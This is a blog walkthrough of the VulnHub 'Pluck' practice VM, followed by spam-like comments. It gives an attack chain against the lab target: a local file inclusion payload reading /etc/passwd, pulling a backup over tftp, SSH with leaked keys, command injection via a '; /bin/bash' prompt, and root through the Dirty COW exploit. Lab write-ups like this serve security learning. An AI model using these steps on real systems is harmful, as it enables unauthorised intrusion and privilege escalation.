Welcome to my another walkthrough. at this time we’ll look another VM, Pluck is a new VM in VulnHub and its very easy to hack. This Is very good for Newbie hackers for practice and explore their Hacking skills.
We know Target IP : 10.0.0.15 (in my case)
Download Link : https://download.vulnhub.com/pluck/pluck.ova.zip
Now lets Start our Walkthrough.
Scan VM using namp
nmap -p- -sV 10.0.0.15
now we know server’s port 80 open. that means server to host any website.
Scan Vulnerability and Exploitin
Explore this website and search vulnerability. When i visited its About and Contact us page i noticed url , its showing me page=about.php parameter with .php file.
I decided to try to exploit LFI( Local File Inclusion ) attack.
payload : /etc/passwd
URL look like : http://10.0.0.15/index.php?page=/etc/passwd
Note : at the end of file its leak Backup script file path and name (Highlighted in image above)
now url is : http://10.0.0.15/index.php?page=/usr/local/scripts/backup.sh
This script contain very usefull information (See Highlighted text in above pic)
now we know the server use tftp protocol for backup their data.
Lets Fireup our Terminal and type.
we know the backup file name backup.tar
tftp> get backup.tar
Goto your local directory and extract backup.tar
In Backup/home directory 3 user present but only paul have keys.
Using paul keys to login SSH (Try each key )
lets try ssh, Fireup ur terminal and type
ssh -i id_key4 [email protected]
Pdmenu appear. Now there i stuck for some mins to figure out what next.
So, i Decided to select Edit file option in Pdmenu
when i click Edit file shows prompt for name.
in prompt i typed ” ; id ” (without quotes) and enter.<–This vulnerability is know as Command Injection
When u press Enter Vim screen up just type ” :q ” (without quotes )
After exit Vim u can see ur next command output which u inject in prompt.
Do Again last to step : Goto Edit file but this time type “; /bin/bash ” in prompt.
if you do all the things correctly. below the output.
We got paul’s Shell.
now the final step s privilege escalation. to get root privilege first check kernel version (there are many way to get root access )
kernel version is : 4.8.0
Dirty cow is the best vulnerability for this version of kernel.
URL link : https://www.exploit-db.com/exploits/40616/
Download this exploit in paul’s home directory using wget command.
mv 40616 dirtycow.c
now compile and run dirtycow.c
gcc dirtycow.c -o dirtycow -pthread
We Got root privilege. woooooooooooooooooh
Thank you. Comment Below for more
That is a great tip especially to those fresh to
the blogosphere. Short but very accurate information… Appreciate your
sharing this one. A must read post!
thanks For Appreciating Me….
Touche. Sound arguments. Keep up the amazing work.
Hey very cool blog!! Man .. Excellent ..
Wonderful .. I will bookmark your website and take the feeds additionally?
I am happy to find numerous helpful info right
here within the post, we need develop extra strategies on this regard, thank you for sharing.
. . . . .
This is very interesting, You’re a very skilled blogger.
I’ve joined your feed and look forward to seeking more of your magnificent post.
Also, I’ve shared your site in my social networks!
Thanks for finally talking about > Pluck Walkthrough (VulnHub) – Touhid's Blog < Liked it! asmr 0mniartist
Hey, I think your site might be having browser
compatibility issues. When I look at your blog site in Ie,
it looks fine but when opening in Internet Explorer,
it has some overlapping. I just wanted to give you a quick
heads up! Other then that, superb blog! 0mniartist asmr
I read this post fully about the resemblance of newest and previous technologies, it’s remarkable article.
My family members always say that I am killing my time here at net,
however I know I am getting experience everyday by reading thes nice articles.
That is a very good tip particularly to those fresh to
the blogosphere. Brief but very precise info… Thank you for
sharing this one. A must read post! 0mniartist asmr
I think the admin of this site is genuinely working hard in support of his web
page, as here every material is quality based information.